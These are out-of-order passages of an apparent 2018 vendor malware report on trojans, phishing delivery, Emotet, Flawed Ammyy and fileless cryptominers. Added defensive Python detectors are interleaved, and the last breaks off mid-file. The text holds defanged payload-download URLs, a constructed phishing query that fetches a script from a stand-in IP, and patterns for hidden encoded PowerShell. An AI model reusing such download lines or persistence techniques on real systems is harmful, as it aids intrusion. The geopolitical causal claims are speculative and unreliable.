Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
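As an added example (not code from the report or from Comodo), the following Python scores a PE file's sections for the traces a UPX-style packer leaves even when a modified build renames its sections: high Shannon entropy of the packed blob, write-plus-execute section permissions, and a section with virtual space but no raw data for the unpacker to fill. The minimal PE images, their section layouts and the 7.0 bits-per-byte threshold are constructed assumptions for this demonstration, not Comodo's detection logic.

```python
"""PE packer heuristics that do not depend on section names.

Parses the PE section table and scores every section on the traces a
UPX-style packer leaves behind: a high-entropy packed blob, write+execute
permissions (the stub unpacks in place) and a large section with virtual
space but no raw data (the unpack destination). Thresholds are assumptions.
"""
import math
import random
import struct
from typing import Dict, List, Tuple

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2"}
HIGH_ENTROPY = 7.0  # bits per byte; ordinary x86 code sits well below this


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> List[Dict]:
    """Walk DOS header -> PE signature -> COFF header -> IMAGE_SECTION_HEADER table."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image: bad PE signature")
    num_sections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_header_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    offset = e_lfanew + 24 + opt_header_size  # first section header
    sections = []
    for _ in range(num_sections):
        name, vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, offset)
        characteristics = struct.unpack_from("<I", pe, offset + 36)[0]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": raw_size,
                         "characteristics": characteristics,
                         "data": pe[raw_ptr:raw_ptr + raw_size]})
        offset += 40
    return sections


def packer_indicators(pe: bytes) -> Tuple[int, List[str]]:
    """Return (score, reasons); each indicator is one point, two or more merit a look."""
    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    hits = []
    for s in parse_sections(pe):
        name = s["name"]
        if name in KNOWN_PACKER_SECTIONS:
            hits.append(f"{name}: known packer section name")
        entropy = shannon_entropy(s["data"]) if s["raw_size"] else 0.0
        if entropy > HIGH_ENTROPY:
            hits.append(f"{name}: high entropy ({entropy:.2f} bits/byte)")
        if s["characteristics"] & rwx == rwx:
            hits.append(f"{name}: section is writable and executable")
        if s["raw_size"] == 0 and s["virtual_size"] >= 0x1000:
            hits.append(f"{name}: no raw data but large virtual size (unpack target)")
    return len(hits), hits


def build_pe(sections: List[Tuple[str, int, int, bytes]]) -> bytes:
    """Assemble a minimal, non-loadable PE image (no optional header) for testing.
    Each tuple is (name, virtual_size, characteristics, raw_bytes)."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew = 64
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    table, body = b"", b""
    raw_ptr = len(dos) + len(coff) + 40 * len(sections)
    for name, vsize, chars, raw in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize, 0x1000,
                             len(raw), raw_ptr if raw else 0, 0, 0, 0, 0, chars)
        body += raw
        raw_ptr += len(raw)
    return dos + coff + table + body


# Constructed sample images (not real malware): pseudo-random bytes stand in for a
# UCL-compressed blob, a repeating prologue/NOP/RET pattern for ordinary code.
_rng = random.Random(2018)
PACKED_BLOB = bytes(_rng.getrandbits(8) for _ in range(4096))
RWX = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE | 0x40000000  # plus MEM_READ
PACKED_SAMPLE = build_pe([("UPX0", 0x20000, RWX, b""), ("UPX1", 0x1000, RWX, PACKED_BLOB)])
RENAMED_SAMPLE = build_pe([(".text", 0x20000, RWX, b""), (".data", 0x1000, RWX, PACKED_BLOB)])
PLAIN_SAMPLE = build_pe([
    (".text", 0x800, IMAGE_SCN_MEM_EXECUTE | 0x40000020, b"\x55\x8b\xec\x90\x90\xc3" * 300),
    (".data", 0x200, IMAGE_SCN_MEM_WRITE | 0x40000040, b"Hello, world\0" * 40),
])
```

Running `packer_indicators` on the three images scores the named-UPX sample 6, the renamed sample 4 and the plain one 0, so the renamed variant is still caught by entropy and permissions alone.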
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous – but still something to be aware of.
5.4 Low Threat Malware Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US – and to a lesser extent Ukraine – have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart, showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral events. In mid-April, Iraq was preparing for a national election, which included a conundrum over how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
8 Conclusions
In Q2 Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
TrojWare.Win32.Injector uses process injection as its main technique to take malicious actions. It is mostly used to bypass security products.
TrojWare.JS.Downloader consists of scripts that download and execute malware from the Internet. It's usually spread via a phishing email.
Such diversity of malicious activity of trojans, and their special ability to hide, have always made them one of the hardest kinds of malware to fight. But in Q2 2018 they became even more sophisticated and dangerous. Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community.
First among the trends is an explosive mixture of trojans and phishing emails. Earlier, phishing emails mostly contained a link to a malicious website to lure victims into supplying their credentials. But today phishing emails have become a potent means of delivery for trojans and other malware. These trojans steal credentials and private information by ferreting through infected machines in search of valuable data and then sending it to cybercriminals' servers.
The accompanying graph shows the most popular malware spread via email. Note that 18 of 20 are trojans.
Distribution of Phishing Families of Malware
2.1 The Most Widespread Trojan
The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.
If a user takes the bait and runs the file, it copies itself to the AppData folder as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.
It collects credentials and private data from known browsers, email clients, FTP clients, WebDAV and SCP clients. Then it sends all the collected data to the attackers' server, httpcallbedmlpackfarefrephp.
The phishing email
2.2 PowerShell-based attack with Emotet
Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware based not on Windows native .exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.
Emotet is one of the most aggressive trojans currently acting in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.
The following attack started with an email that imitated a message from the IRS about a "Tax Account Transcript". Notice the message is written in a cheerful manner to inspire user trust.
The phishing email
The attached file is an Office document containing a VBScript. As the settings of a newly installed Microsoft Office do not allow execution of such scripts by default, the attackers added a special option to convince the victims to turn on VBScript execution.
The special option to convince the victims to turn on VBScript execution
The purpose of the VBScript is to launch PowerShell
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlc, hxxpwwwthecyberconxioncomPUqUUe, hxxpEliasWesselcomvu6xGmS, hxxpmossbeachmusicdeXuBBN6r and hxxpairmaxxrswIdY.
At the time of writing, only the thecyberconxion.com host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service "lanesviewer" to ensure persistence.
The malware creates the "lanesviewer" service to ensure persistence
And after that Emotet begins its real mission – stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.
The next example is even more cunning because it infects computers with popular, legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on a legitimate software product called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief.
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see on the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest version of the malicious modification of Ammyy Admin is called Flawed Ammyy. It's a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. The Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok – steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that these tricks are also based on using legitimate software – Microsoft's this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.
The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
Malware runs PowerShell
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
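To show how a mail gateway could triage this attachment type, here is an added Python example (not code from the report or from Comodo) that parses the IQY text format described above and flags the traits of the delivery chain just described: a URL on a host outside the organisation, plain HTTP, an IP-literal host, or a path ending in a script or executable. The sample files, the allowlisted host and the flag names are constructed for this example.

```python
"""Mail-gateway triage for Excel Web Query (.iqy) attachments.

An IQY file is plain text: line 1 is the literal "WEB", line 2 the query
version (normally "1"), line 3 the URL Excel will fetch, and any further
lines are optional key=value settings such as Selection=AllTables.
Blank lines are skipped. The flag names and the host allowlist are this
example's own assumptions, not a Comodo or Microsoft specification.
"""
import ipaddress
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set
from urllib.parse import urlsplit

# A spreadsheet data query has no business pulling a script or executable.
SUSPICIOUS_EXTENSIONS = (".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta", ".scr")


@dataclass
class IqyTriage:
    url: Optional[str] = None
    host: str = ""
    options: Dict[str, str] = field(default_factory=dict)
    flags: List[str] = field(default_factory=list)

    @property
    def verdict(self) -> str:
        """Reject malformed files, quarantine anything flagged, allow the rest."""
        if "malformed" in self.flags:
            return "reject"
        return "quarantine" if self.flags else "allow"


def parse_iqy(text: str, allowed_hosts: Set[str]) -> IqyTriage:
    """Extract the query URL and flag traits a benign internal query would not have."""
    result = IqyTriage()
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        result.flags.append("malformed")
        return result
    result.url = lines[2]
    for extra in lines[3:]:          # optional settings, e.g. Selection=AllTables
        key, sep, value = extra.partition("=")
        if sep:
            result.options[key.strip()] = value.strip()
    parts = urlsplit(result.url)
    result.host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https"):
        result.flags.append("non-web-scheme")
    elif parts.scheme == "http":
        result.flags.append("cleartext-http")   # fetched content cannot be integrity-checked
    if not result.host:
        result.flags.append("no-host")
    else:
        try:
            ipaddress.ip_address(result.host)
            result.flags.append("ip-literal-host")
        except ValueError:
            pass                                 # a normal DNS name
        if result.host not in allowed_hosts:
            result.flags.append("external-host")
    if parts.path.lower().endswith(SUSPICIOUS_EXTENSIONS):
        result.flags.append("executable-path")
    return result


# Constructed samples (not from the report): an internal reporting query and a
# phishing-style query fetching a script from an unknown host over plain HTTP.
CORP_HOSTS = {"reports.corp.example"}
BENIGN_IQY = "WEB\n1\nhttps://reports.corp.example/sales.csv\n\nSelection=AllTables\n"
PHISH_IQY = "WEB\n1\nhttp://203.0.113.10/update/invoice.vbs\n"

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_IQY), ("phish", PHISH_IQY)):
        triage = parse_iqy(sample, CORP_HOSTS)
        print(f"{label}: {triage.verdict} {triage.url} {triage.flags}")
```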
2.4 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulation of users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks are only discovered too late, after money is withdrawn from a bank account or confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell for running malware will amplify the number of victims even more, because such attacks are much harder to detect with antivirus software.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in line with the new trends above. Combining the best malware detection tools with methods of protecting data built on defense-in-depth principles provides the most promising solution.
[Chart: The growth of Flawed Ammyy attacks for Q2. Data labels 43188, 46382 and 48881 plotted against an Apr / May / Jun axis scaled from 40000 to 50000.]
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean their impact is greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware consists of malicious code injected into legitimate OS processes. It need not be installed on the victim machine but functions only in memory, making it much harder for antiviruses to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
BadShell at work
The malicious code in the registry
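As an added example (editor's code, not the report's or Comodo's), the following hunt applies the BadShell description above to process-creation telemetry: it decodes the PowerShell -EncodedCommand argument, looks for a script that reads a registry value and base64-decodes it, and pairs that with hidden-window flags and schtasks-based persistence. The event records are constructed for the example; the field names follow Sysmon conventions but are assumptions.

```python
"""Added example (editor's code, not from the Comodo report): hunting the
BadShell pattern in process-creation telemetry.

The report describes three legitimate components being abused: PowerShell
runs the commands, the Registry stores the encoded binary and Task Scheduler
restarts it. Each leaves a trace in process-creation events (Sysmon ID 1 or
Windows 4688), so a hunt can decode -EncodedCommand arguments and look for
the combination. The events below are constructed for the example.
"""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
_PREFIXES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
ENC_RE = re.compile(r"(?:^|\s)-(?:%s)\s+([A-Za-z0-9+/=]+)" % "|".join(_PREFIXES), re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
REG_READ_RE = re.compile(r"Get-ItemProperty|GetValue\(|Get-ItemPropertyValue", re.IGNORECASE)
B64_RE = re.compile(r"FromBase64String", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script hidden behind -EncodedCommand, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def indicators(event):
    """List the BadShell-style indicators present in one process event."""
    image = event["image"].lower()
    cmd = event["cmdline"]
    found = []
    script = decode_encoded_command(cmd)
    if script is not None:
        found.append("encoded_command")
        if REG_READ_RE.search(script) and B64_RE.search(script):
            found.append("registry_payload")  # binary pulled from a registry value
    if HIDDEN_RE.search(cmd):
        found.append("hidden_window")
    if image.endswith("schtasks.exe") and "/create" in cmd.lower() and "powershell" in cmd.lower():
        found.append("scheduled_task_persistence")
    return found


def hunt(events):
    """Return [(pid, indicators)] for events that deserve analyst attention."""
    hits = []
    for ev in events:
        ind = indicators(ev)
        if "registry_payload" in ind or "scheduled_task_persistence" in ind or len(ind) >= 2:
            hits.append((ev["pid"], ind))
    return hits


def _enc(script):
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"pid": 4120, "image": PS, "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + _enc(
         "$d=(Get-ItemProperty 'HKCU:\\Software\\ExampleVendor').Blob;"
         "$b=[Convert]::FromBase64String($d)")},
    {"pid": 5012, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\inventory.ps1"},
    {"pid": 5100, "image": r"C:\Windows\System32\schtasks.exe", "parent": PS,
     "cmdline": 'schtasks.exe /Create /SC MINUTE /MO 5 /TN "Updater" /F '
                '/TR "powershell -w hidden -enc ' + _enc("Start-Sleep 1") + '"'},
]

if __name__ == "__main__":
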